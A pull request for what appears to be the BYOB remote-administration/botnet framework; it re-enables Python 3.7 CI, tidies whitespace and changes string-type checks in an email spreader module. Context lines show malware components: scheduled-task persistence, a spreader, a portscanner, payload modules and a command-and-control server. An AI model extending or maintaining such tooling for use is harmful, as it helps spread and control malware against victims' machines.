### PR TITLE
Reenable testing on Python 3

### DIFF
--- a/.travis.yml
+++ b/.travis.yml
@@ -7,17 +7,14 @@ matrix:
     #- python: 3.4
     #- python: 3.5
     #- python: 3.6
-    #- python: 3.7
-    #  dist: xenial    # required for Python 3.7 (travis-ci/travis-ci#9069)
-    #  sudo: required  # required for Python 3.7 (travis-ci/travis-ci#9069)
+    - python: 3.7
+      dist: xenial    # required for Python >= 3.7 (travis-ci/travis-ci#9069)
+      sudo: required  # required for Python >= 3.7 (travis-ci/travis-ci#9069)
 install:
-  - pip install -r byob/requirements.txt
-  - pip install flake8
+  - pip install flake8 -r byob/requirements.txt
 before_script:
-  # stop the build if there are any unused imports
-  - flake8 . --count --select=F401 --show-source --statistics
-  # stop the build if there are Python syntax errors or undefined names
-  - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
+  # stop the build if there are Python syntax errors, unused imports, or undefined names
+  - flake8 . --count --select=E901,E999,F401,F821,F822,F823 --show-source --statistics
   # exit-zero treats all errors as warnings.  The GitHub editor is 127 chars wide
   - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
 script:

--- a/byob/core/__init__.py
+++ b/byob/core/__init__.py
@@ -45,8 +45,8 @@ byob.core
   byob.core.security
     module containing the Diffie-Hellman Internet Key Exchange (RFC 2741)
     method for securing a shared secret key even over insecure networks,
-    as well as encryption & decryption methods for 2 different modes:  
-     - AES-256-CBC                                                          
+    as well as encryption & decryption methods for 2 different modes:
+     - AES-256-CBC
      - XOR-128
 
   byob.core.loader

--- a/byob/core/loader.py
+++ b/byob/core/loader.py
@@ -123,7 +123,7 @@ class Loader(object):
             except ValueError:
                 pass
             try:
-                module_src = marshal.loads(module_compiled[12:])# Strip the .pyc file header of Python 3.3 and onwards (changed .pyc spec)
+                module_src = marshal.loads(module_compiled[12:])  # Strip the .pyc file header of Python 3.3 and onwards (changed .pyc spec)
                 return module_src
             except ValueError:
                 pass

--- a/byob/core/payloads.py
+++ b/byob/core/payloads.py
@@ -498,7 +498,7 @@ class Payload():
     def icloud(self):
         """
         Check for logged in iCloud account on macOS
-        
+
         """
         if 'icloud' not in globals():
             self.load('icloud')

--- a/byob/core/security.py
+++ b/byob/core/security.py
@@ -242,7 +242,6 @@ class AESModeOfOperationCBC(AES):
 
     """
 
-
     name = "Cipher-Block Chaining (CBC)"
     block_size = 16
 

--- a/byob/core/util.py
+++ b/byob/core/util.py
@@ -133,7 +133,7 @@ def ipv4(address):
     import socket
     try:
         if socket.inet_aton(str(address)):
-           return True
+            return True
     except:
         return False
 

--- a/byob/modules/__init__.py
+++ b/byob/modules/__init__.py
@@ -45,8 +45,8 @@ byob.core
   byob.core.security
     module containing the Diffie-Hellman Internet Key Exchange (RFC 2741)
     method for securing a shared secret key even over insecure networks,
-    as well as encryption & decryption methods for 2 different modes:  
-     - AES-256-CBC                                                          
+    as well as encryption & decryption methods for 2 different modes:
+     - AES-256-CBC
      - XOR-128
 
   byob.core.loader

--- a/byob/modules/persistence.py
+++ b/byob/modules/persistence.py
@@ -242,9 +242,10 @@ def _remove_scheduled_task():
     if _methods['scheduled_task'].established:
         value = _methods['scheduled_task'].result
         try:
-             if subprocess.call('SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0:
-                 return (False, None)
-        except: pass
+            if subprocess.call('SCHTASKS /DELETE /TN {} /F'.format(value), shell=True) == 0:
+                return (False, None)
+        except:
+            pass
     return (_methods['scheduled_task'].established, _methods['scheduled_task'].result)
 
 def _remove_hidden_file():

--- a/byob/modules/phone.py
+++ b/byob/modules/phone.py
@@ -40,4 +40,3 @@ def run(message=None, number=None, sid=None, token=None):
 		return "SUCCESS: text message sent to {}".format(number)
 	except Exception as e:
 		return "{} error: {}".format(run.func_name, str(e))
-

--- a/byob/modules/portscanner.py
+++ b/byob/modules/portscanner.py
@@ -103,4 +103,3 @@ def run(target='192.168.1.1', ports=[21,22,23,25,80,110,111,135,139,443,445,554,
         return json.dumps(results[target])
     else:
         return "Target offline"
-

--- a/byob/modules/spreader.py
+++ b/byob/modules/spreader.py
@@ -5,17 +5,20 @@
 # standard library
 import os
 import re
-import sys
 import time
 import email
 import logging
 import smtplib
 import mimetypes
 
+try:
+    string_types = (str, unicode)
+except NameError:
+    string_types = (str, )
+
 # globals
 command = True
 platforms = ['win32','darwin','linux2']
-text_type = (str,) if sys.version_info[0] == 3 else (str, unicode)
 GOOGLE_ACCOUNTS_BASE_URL = 'https://accounts.google.com'
 REDIRECT_URI = 'urn:ietf:wg:oauth:2.0:oob'
 description = """
@@ -131,7 +134,7 @@ def resolve_addresses(user, useralias, to, cc, bcc):
     return addresses
 
 def make_addr_alias_user(email_addr):
-    if isinstance(email_addr, text_type):
+    if isinstance(email_addr, string_types):
         if "@" not in email_addr:
             email_addr += "@gmail.com"
         return (email_addr, email_addr)
@@ -141,11 +144,11 @@ def make_addr_alias_user(email_addr):
     raise AddressError
 
 def make_addr_alias_target(x, addresses, which):
-    if isinstance(x, text_type):
+    if isinstance(x, string_types):
         addresses["recipients"].append(x)
         addresses[which] = x
     elif isinstance(x, list) or isinstance(x, tuple):
-        if not all([isinstance(k, text_type) for k in x]):
+        if not all([isinstance(k, string_types) for k in x]):
             raise AddressError
         addresses["recipients"].extend(x)
         addresses[which] = "; ".join(x)
@@ -173,9 +176,9 @@ def add_recipients_headers(user, useralias, msg, addresses):
 
 # message
 def prepare_message(user, useralias, addresses, subject, contents, attachments, headers, encoding):
-    if isinstance(contents, text_type):
+    if isinstance(contents, string_types):
         contents = [contents]
-    if isinstance(attachments, text_type):
+    if isinstance(attachments, string_types):
         attachments = [attachments]
 
     if attachments is not None:

--- a/byob/modules/util.py
+++ b/byob/modules/util.py
@@ -133,7 +133,7 @@ def ipv4(address):
     import socket
     try:
         if socket.inet_aton(str(address)):
-           return True
+            return True
     except:
         return False
 

--- a/byob/server.py
+++ b/byob/server.py
@@ -850,7 +850,7 @@ class Session(threading.Thread):
         self.id = id
         self.connection = connection
         self.key = security.diffiehellman(self.connection)
-        self.rsa = None # security.Crypto.PublicKey.RSA.generate(2048)
+        self.rsa = None  # security.Crypto.PublicKey.RSA.generate(2048)
         try:
             self.info = self.recv_task()
             self.info['id'] = self.id
@@ -951,7 +951,7 @@ class Session(threading.Thread):
 
         """
         while True:
-#            try:
+            # try:
             if self._active.wait():
                 task = self.recv_task() if not self._prompt else self._prompt
                 if isinstance(task, dict):


### PR DESCRIPTION
Align with the variable naming with popular six module by using __string_types__ instead of __text_type__ and defined is using feature detection, instead of version detection as discussed in https://docs.python.org/3/howto/pyporting.html#use-feature-detection-instead-of-version-detection

Also fixed some whitespace issues: __flake8 . --select=E111,E115,E127,E261,E303,W2,W3__